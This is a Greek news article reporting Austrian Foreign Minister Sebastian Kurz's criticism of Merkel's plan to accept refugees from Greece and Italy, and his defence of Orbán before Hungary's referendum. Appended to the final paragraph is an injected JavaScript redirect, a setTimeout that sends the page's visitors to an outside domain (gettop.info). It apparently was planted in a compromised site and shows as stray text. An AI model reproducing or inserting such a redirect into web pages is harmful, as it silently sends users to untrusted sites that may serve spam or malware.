Κουρτς: Λάθος η απόφαση της Μέρκελ να πάρει πρόσφυγες από την Ελλάδα

0
8

 

Η εξαγγελία της Άνγκελα Μέρκελ ότι σύντομα η Γερμανία θα αρχίσει να δέχεται εκατοντάδες πρόσφυγες το μήνα από την Ελλάδα και την Ιταλία, είναι «λάθος», διατείνεται, ο Αυστριακός υπουργός Εξωτερικών Σεμπάστιαν Κουρτς.

Στα σημερινά δελτία ειδήσεων της, η δημόσια Αυστριακή Ραδιοφωνία, όπως και δημοσιεύματα στις ηλεκτρονικές σελίδες των αυστριακών εφημερίδων αναφέρονται διεξοδικά σε αυτές τις αμφιλεγόμενες θέσεις του, που αναπτύσσει ο Αυστριακός υπουργός σε μακρά συνέντευξή του στην κυριακάτικη έκδοση της γερμανικής εφημερίδας «Ντι Βελτ» (Βελτ αμ Ζόνταγκ).

Σύμφωνα με τον Σεμπάστιαν Κουρτς, στόχος, προφανώς, της εξαγγελίας της Γερμανίδας Καγκελαρίου είναι να ανακουφίσει αυτές τις δύο χώρες, ωστόσο, κατά τους ισχυρισμούς του, «δυστυχώς επιτυγχάνεται το αντίθετο», δηλαδή ένας ακόμη μεγαλύτερος «συνωστισμός» προσφύγων στην Ελλάδα και στην Ιταλία.

Ενόσω κανείς δίνει στους μετανάστες την αίσθηση, ότι αξίζει τον κόπο να έλθουν στην Ελλάδα και στην Ιταλία, διότι τελικά θα καταλήξουν στην Γερμανία, «ενισχύει τις επιχειρήσεις των διακινητών και δημιουργεί νέα προσφυγικά κύματα», ισχυρίζεται ο Αυστριακός υπουργός Εξωτερικών.

Ενόψει του αμφιλεγόμενου δημοψηφίσματος που διενεργείται σήμερα στην Ουγγαρία, ενάντια στην ευρωπαϊκή προσφυγική πολιτική και ενάντια στην αποφασισμένη από την Ευρωπαϊκή Ένωση κατανομή προσφύγων στις χώρες-μέλη της, ο επικεφαλής της αυστριακής διπλωματίας προειδοποιεί πως δεν θα πρέπει να καταδικάζεται η πολιτική του Ούγγρου πρωθυπουργού Βίκτορ Ορμπάν, και διατείνεται πως, παρά τις υπάρχουσες αποφάσεις, η ΕΕ δεν θα πρέπει να επιμένει στην μετεγκατάσταση προσφύγων σε όλες τις χώρες-μέλη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here